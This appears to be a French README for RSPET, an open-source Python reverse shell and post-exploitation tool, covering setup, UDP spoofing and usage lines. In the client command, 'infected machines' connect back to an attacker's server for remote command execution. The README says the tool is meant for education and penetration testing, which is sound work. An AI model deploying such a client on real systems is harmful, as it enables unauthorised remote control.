
RSPET (Reverse Shell and Post Exploitation Tool) est un reverse shell basé sur Python, doté de fonctionnalités qui facilitent un scénario de post-exploitation.
RSPET (Reverse Shell and Post Exploitation Tool) est un reverse shell basé sur Python équipé de fonctionnalités qui aident dans un scénario de post-exploitation.
AVERTISSEMENT : Ce logiciel est fourni à des fins éducatives et de tests d'intrusion (PenTesting) et comme une preuve de concept. Le(s) développeur(s) n'approuvent, n'incitent ni ne soutiennent d'aucune autre manière l'accès non autorisé à un ordinateur et les perturbations de réseaux.
REMARQUE : Le dossier min a été supprimé. La charge supplémentaire de maintenance de deux versions a conduit à ce que min ne reçoive pas de corrections de bugs et de mises à jour importantes. S'il y a un intérêt, tant pour l'utilisation que pour la maintenance, d'une version plus épurée et simpliste, une nouvelle branche sera créée pour l'héberger.
Version actuelle : v0.3.1
Suivez : @TheRSPET sur Twitter pour les mises à jour.
Documentation : rspet.readthedocs.io
*[1]L'idée du XOR ainsi que le squelette du client proviennent de primalsecurity.net donc si vous aimez cet ensemble de scripts, vous aimerez probablement ce qu'ils font
*[2]L'usurpation UDP utilise RAW_SOCKETS donc pour l'utiliser, le client doit fonctionner sur un système d'exploitation prenant en charge RAW_SOCKETS (la plupart des systèmes basés sur Unix) et avec des privilèges root. Enfin, la plupart des FAI ont mis en place des implémentations qui vont soit rejeter, soit restructurer les paquets usurpés
*[3]Consultez à nouveau l'excellent blogpost de primalsecurity.net sur la production d'un .exe
*[4]Une documentation détaillée sur la création de plugins est disponible dans la Documentation en ligne!
rspet_server.py est situé sur la machine de l'attaquant et s'exécute pour accepter les connexionsrspet_client.py est situé sur la ou les machines infectées et initiera la connexion et attendra les entrées.L'exécution de ./setup.py à partir du dossier racine du projet générera les certificats requis et installera tous les composants nécessaires via pip.
Bien sûr, vous pouvez installer manuellement les paquets pip requis en exécutant pip2 install Flask flask-cors. Vous pouvez également générer votre propre jeu de clés et certificats (nommez-les server.key et server.crt et placez-les dans le dossier Server).
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections prend la valeur par défaut 5 si laissé vide.
API RESTful :
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
Client :
python rspet_client.py <server_ip> [server_port]
De nombreuses modifications peuvent être apportées pour répondre aux besoins individuels.
Comme toujours, si vous avez des suggestions, des rapports de bugs ou des plaintes, n'hésitez pas à me contacter.
Une liste de distributions contenant RSPET
List_HostsCe projet suit le Guide de style Python de Google avec une variation mineure sur l'utilisation des espaces blancs pour aligner les jetons ":" .
Ce projet est ouvert aux contributeurs. Si vous avez implémenté une nouvelle fonctionnalité, ou peut-être une amélioration du code actuel, n'hésitez pas à ouvrir une pull request. Si vous souhaitez suggérer une nouvelle fonctionnalité, ouvrez une issue. De plus, des testeurs sont nécessaires pour exécuter quelques scénarios standard (et peut-être quelques-uns personnels) afin de réduire les risques qu'un bug s'infiltre dans une nouvelle version. S'il y a un intérêt pour les tests, une branche beta sera créée (où le code à tester sera téléchargé) ainsi qu'une liste de scénarios. Pour un guide complet sur les opportunités de contribution et les guides, consultez le chapitre « Contribuer » de la documentation en ligne de RSPET
dzervas -- Code (Réorganisation OO du serveur, Implémentation du système de plugins serveur, rapports de bugs, corrections de bugs)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
Le gâteau est un mensonge. Mais cela fait un an :)